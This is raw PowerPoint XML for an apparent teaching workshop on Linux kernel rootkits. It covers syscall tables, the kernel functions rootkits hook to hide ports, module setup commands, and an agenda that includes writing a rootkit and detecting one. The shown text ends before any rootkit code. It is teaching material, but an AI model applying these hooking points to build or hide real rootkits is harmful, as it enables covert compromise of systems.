      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1417638"/>
            <a:ext cx="190500" cy="931862"/>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7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3246437"/>
            <a:ext cx="717550" cy="777875"/>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13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2095500" y="4318000"/>
            <a:ext cx="587375" cy="269875"/>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16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="793750" y="5554663"/>
            <a:ext cx="381000" cy="763588"/>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955561629"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Day 1:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a kernel? (hint: no popcorn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Important OS elements (CMSC412 101)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How does a kernel rootkit tick?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to code Linux kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Day 2:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Writing your first rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Install rootkit on a VM, watch as it burns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review code of a modern Linux rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detection methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wrap-up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1786389299"/>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System call table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1273215"/>
            <a:ext cx="8229600" cy="5235535"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> numbers defined in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>arch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/x86/include/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/unistd_64.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ex: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>NR_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>NR_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Browse the Linux kernel source for a while like Greg does in his spare time and you’ll find… the signatures for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>asmlinkage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sys_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>error_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>asmlinkage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sys_creat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> char __user *pathname, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>umode_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>asmlinkage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sys_chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> char __user *filename, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>gid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Pulled directly from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787079" y="6488668"/>
            <a:ext cx="4620176" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See: https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>filippo.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-table/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829371296"/>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457200" y="274638"/>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mtClean="0"/>
              <a:t>System call table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065508" y="0"/>
            <a:ext cx="7012983" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1172895038"/>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Here’s the file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>lxr.free-electrons.com/source/include/linux/syscalls.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="890606230"/>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Thanks Greg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why should I care about this interrupt call system table whatchamacallit junk?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I just wanted to go one day without looking at assembly code, why did you do this to me?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thanks for asking!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626361776"/>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kernel rootkits modify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To hide ports, for example, rootkits often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>modify </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tcp4_seq_show</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tcp6_seq_show</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>udp4_seq_show</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>udp6_seq_show</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2681021182"/>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How rootkits get into the kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drivers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s as driver? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It’s a kernel module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code that goes into the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kmods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are loaded into kernel memory, </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114760235"/>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Break time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We’re going to write a quick kernel module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Install dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-headers-$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–r)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235601070"/>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40344"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hello world module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1067768"/>
            <a:ext cx="8229600" cy="633714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Modified from example on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>tldp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578735" y="1575606"/>
            <a:ext cx="8900932" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/*  </a:t>
            </a:r>
          </a:p>
